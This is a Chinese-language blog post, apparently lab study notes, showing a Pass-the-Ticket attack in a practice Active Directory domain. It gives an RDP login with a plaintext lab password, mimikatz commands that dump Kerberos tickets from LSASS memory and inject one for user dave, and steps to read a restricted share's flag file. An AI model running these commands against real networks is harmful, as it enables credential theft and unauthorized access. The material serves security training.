Active Directory 中的橫向移動 - PtT

 Active Directory 中的橫向移動 - PtT

Pass the Ticket


使用 CORP\jen / Nexus123! RDP 登入到 Client76

└─$ xfreerdp /u:jen /p:'Nexus123!' /d:corp.com /v:192.168.191.76






直接存取 web04 上的 backup 資料夾看看 ls \\web04\backup

直接顯示 Access is denied




啟動 mimikatz 然後開啟 debug mode : privilege::debug

接著輸入 sekurlsa::tickets /export 從記憶體中匯出所有 TGT/TGS

可以看到 dave 的 Session Key





退出 mimikatz 執行 dir *.kirbi

這是因為 sekurlsa::tickets /export 顯示出來的結果是解析記憶體中的 LSASS 進程空間以查找任何 TGT/TGS,然後以 kirbi mimikatz 格式儲存到磁碟,所以我們直接列出所有的 *.kirbi 如下

因為我們的目標是 web04 所以將相關的 *.kirbi 專注在有 web04 的地方

可以看到是 dave @ web04,其中一筆是 [0;163e20]-0-0-40810000-dave@cifs-web04.kirbi






透過 mimikatz 的 ptt 方式執行

kerberos::ptt [0;163e20]-0-0-40810000-dave@cifs-web04.kirbi




再 klist 看一下,可以看到網域中 dave 的憑證了

針對的伺服器是 cifs/web04@corp.com




再執行 ls \\web04\backup 這一次沒有 Access is denied 了,直接列出相關的資源供查看





練習 : 與上面一樣,最後拿那個分享資料夾的 flag.txt

直接將 ls 改 type 即可讀取



留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)